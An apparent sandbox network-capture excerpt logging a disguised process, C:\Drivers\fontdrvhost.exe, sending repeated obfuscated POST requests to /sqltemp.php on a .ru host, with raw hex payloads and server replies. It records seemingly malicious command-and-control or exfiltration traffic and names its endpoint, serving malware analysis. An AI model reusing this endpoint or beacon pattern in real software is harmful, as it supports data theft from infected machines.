                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4713&min_rtt=1874&rtt_var=6382&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1307&delivery_rate=59371&cwnd=171&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            16192.168.2.449763104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:18.432210922 CET295OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Jan 1, 2025 14:52:18.777070999 CET1012OUTData Raw: 56 5f 5f 51 54 50 54 51 58 56 52 59 56 51 59 56 5b 5c 54 5f 55 5e 50 5e 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: V__QTPTQXVRYVQYV[\T_U^P^Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S._$Z7:3/::!=(<#V=>; !7Y?6$/.&Y.,Y-
                                                                                                                                                                                            Jan 1, 2025 14:52:18.876559019 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:19.147226095 CET800INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:19 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FdBnwkwBTEqkwHb9OoBsDmZYdzOQrDGNdcS90TvpTMxtzh3Vfzlc7CixI8Iabyw1eCFzLd5KxPwOTfEffF1CnwG35W7HfImZ343Vm1PAj8zwjg%2FIXypakf8DiwG9D4Pnlu9dy0zF"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fd35bf0643f4-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3837&min_rtt=1730&rtt_var=4864&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1307&delivery_rate=78528&cwnd=193&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            17192.168.2.449764104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:19.563011885 CET295OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1852
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Jan 1, 2025 14:52:19.917488098 CET1852OUTData Raw: 53 57 5a 50 54 5e 54 5c 58 56 52 59 56 5b 59 55 5b 5f 54 5b 55 5b 50 5f 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: SWZPT^T\XVRYV[YU[_T[U[P_Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.&?5Y 9%>E82!.;<9 =>+7(?=@%+U:&Y.,Y-)
                                                                                                                                                                                            Jan 1, 2025 14:52:20.007232904 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:20.312602997 CET956INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:20 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FZODa1hYGX5YpNfCp8qhG2h18S%2B4dNUlxFFkJrOF9zJ9hu7VN6vOiv3NNHoaabu25LlWzvbxccvY7NOedwt%2BOQrLbxo53oz9e0MiFLQS%2F80ewVUN%2BykEtssknJWYpVjGPYobhefN"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fd3cc92e0caa-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1911&min_rtt=1600&rtt_var=1222&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2147&delivery_rate=356880&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 39 38 0d 0a 00 1f 25 1d 3d 03 26 1c 26 0b 34 5a 3f 2d 06 0c 27 2e 31 03 2b 06 3a 5f 30 3d 27 10 29 29 23 58 21 2c 0c 01 31 3b 3c 13 34 3d 09 13 24 0e 2b 59 05 1c 20 06 23 3c 33 01 29 3e 27 16 32 06 2d 59 30 3d 38 16 2b 38 2c 54 34 38 3b 12 24 3e 28 11 2a 14 33 0a 27 12 30 06 2e 11 0c 0e 24 00 2c 54 00 11 26 57 33 31 16 58 37 24 33 01 21 1f 35 10 25 1a 22 15 32 3c 2f 53 23 39 3e 14 26 0c 3f 10 35 0a 2e 5e 26 28 39 5b 23 03 33 54 29 2e 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 98%=&&4Z?-'.1+:_0='))#X!,1;<4=$+Y #<3)>'2-Y0=8+8,T48;$>(*3'0.$,T&W31X7$3!5%"2</S#9>&?5.^&(9[#3T).%S -H?WS0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            18192.168.2.449765104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:19.577934027 CET295OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1008
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Jan 1, 2025 14:52:19.933250904 CET1008OUTData Raw: 56 5f 5f 56 54 58 51 52 58 56 52 59 56 59 59 51 5b 5b 54 5c 55 5e 50 54 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: V__VTXQRXVRYVYYQ[[T\U^PTZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-3/""?:3'/1W#0+:'*. #"(+>2'V,:&Y.,Y-9
                                                                                                                                                                                            Jan 1, 2025 14:52:20.030523062 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:20.299685955 CET808INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:20 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fK2ykM28Ch4Wj%2F2PfOb1AVTr3ecKYuR7MO%2BvrMRCcsexC31SFflD3%2B6lG%2FOzuPCvbEXNetymX2Fx237URURazreJcDaSWV9cFng61NkSXQ8Hj4zDjkuBVIhJ5bNl61P%2BVTxoJpnD"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fd3ce8eb422e-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4393&min_rtt=1762&rtt_var=5922&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1303&delivery_rate=64007&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            19192.168.2.449766104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:20.433525085 CET295OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Jan 1, 2025 14:52:20.792599916 CET1012OUTData Raw: 53 53 5a 54 51 5d 54 5d 58 56 52 59 56 51 59 57 5b 5e 54 58 55 54 50 5e 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: SSZTQ]T]XVRYVQYW[^TXUTP^Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.0%X =\$'D.9-!-+(_?V(>87'Z+*$/V9:&Y.,Y-
                                                                                                                                                                                            Jan 1, 2025 14:52:20.898731947 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:21.162894964 CET802INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:21 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w88tp0uzcQ8eaJCHP9Wcm6UJ0Cf1M5F02tY4OxYKlGZg6nHeSsJHl9AjGoqLFyoxdhlpLFmVtsu%2FshewN73M%2BRt6onTWMNuENe21LpAip9inym0DTiGVw3qHlyXgTXh6tWeInVcs"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fd425eac7cb1-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3881&min_rtt=2047&rtt_var=4437&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1307&delivery_rate=87289&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            20192.168.2.449767104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:21.292273045 CET295OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Jan 1, 2025 14:52:21.636364937 CET1012OUTData Raw: 56 51 5a 50 54 5a 51 57 58 56 52 59 56 50 59 5f 5b 5f 54 5c 55 5a 50 5a 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VQZPTZQWXVRYVPY_[_T\UZPZZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.['/54Y&'/:27$^+)?W*=< !+\*+92?8-:&Y.,Y-
                                                                                                                                                                                            Jan 1, 2025 14:52:21.745121002 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:22.003360033 CET806INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:21 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jxh16YFb%2BJWBDO1Me6iS2dM1%2FX2svQSEYNvsN6ma4Gnzt0tvM0NazU58Fh3TQ%2BegQE8qlgbCWHaE3C79V8xdONzrRlGycisbPxXOcBsmHXUKasyjDhfd6x2dtFUe8fA%2FbU9NZ3R1"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fd479aee43c4-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2916&min_rtt=1710&rtt_var=3053&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1307&delivery_rate=128532&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            21192.168.2.449768104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:22.297456980 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:52:22.651901960 CET1012OUTData Raw: 56 53 5a 56 54 5a 51 57 58 56 52 59 56 5d 59 52 5b 5e 54 51 55 59 50 5e 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VSZVTZQWXVRYV]YR[^TQUYP^Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.X'?*#?"$.,*%!-;(T=.4[41,(]:$//9&Y.,Y-1
                                                                                                                                                                                            Jan 1, 2025 14:52:22.749231100 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:23.024743080 CET803INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:22 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qc0AAov6ukQWtLzsVMJeFi%2BG5pjD7AS1XeYkA03cknl1B9MDmZVv9tui7%2Byp6947Uqd8NLER2jgBbWBFNlDGPY893C0FST62r9ePtDmDwwXOG1ZgxOeX4wb90NlOIKhg0wu43Pet"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fd4de8f4c420-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=8063&min_rtt=1487&rtt_var=13710&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=26988&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            22192.168.2.449769104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:23.150538921 CET295OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Jan 1, 2025 14:52:23.495640039 CET1012OUTData Raw: 56 53 5f 5d 54 5f 54 51 58 56 52 59 56 5c 59 56 5b 53 54 5e 55 5b 50 59 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VS_]T_TQXVRYV\YV[ST^U[PYZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-3<" Y9$?.).4+)>+42Z?;>%7S::&Y.,Y-5
                                                                                                                                                                                            Jan 1, 2025 14:52:23.624933004 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:23.880774021 CET806INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:23 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=41mXtcxDQxYfXXwDfvUxSs3jX%2Bu1VPNwX8wrF2Bt1wrJIwDDNQR26D7p7FgWCp%2BtM6KynzzwMTmJgf9OLwqEMQGwbhRUkJBiDT1KQb1xSJBksf3owN4ZeNyPG%2B7CDjb%2F2NBuVRjH"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fd535a717c9a-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4838&min_rtt=1972&rtt_var=6473&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1307&delivery_rate=58620&cwnd=188&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            23192.168.2.449770104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:24.029736042 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:52:24.387021065 CET1012OUTData Raw: 56 54 5a 54 54 5c 54 53 58 56 52 59 56 58 59 54 5b 5f 54 5e 55 5b 50 5c 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VTZTT\TSXVRYVXYT[_T^U[P\Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.X$*7,%3>,:#-+:(>>,]7(+8>& ::&Y.,Y-%
                                                                                                                                                                                            Jan 1, 2025 14:52:24.474194050 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:24.744895935 CET807INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:24 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CPduo5hJKKMP1zIG7qzEe2Cc5%2FnMwrRgbflLDCv6vK1bAyv0%2FKeVOTnU%2BkQee1dk8ComJtJ8oug43oC7lqTiFxSnrpQnh78Azm9kJATDXd%2BpaVktuGOTc25oECqQZZBgFfaOhErf"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fd58accf42c2-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2316&min_rtt=1713&rtt_var=1850&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=223139&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            24192.168.2.449771104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:24.870827913 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
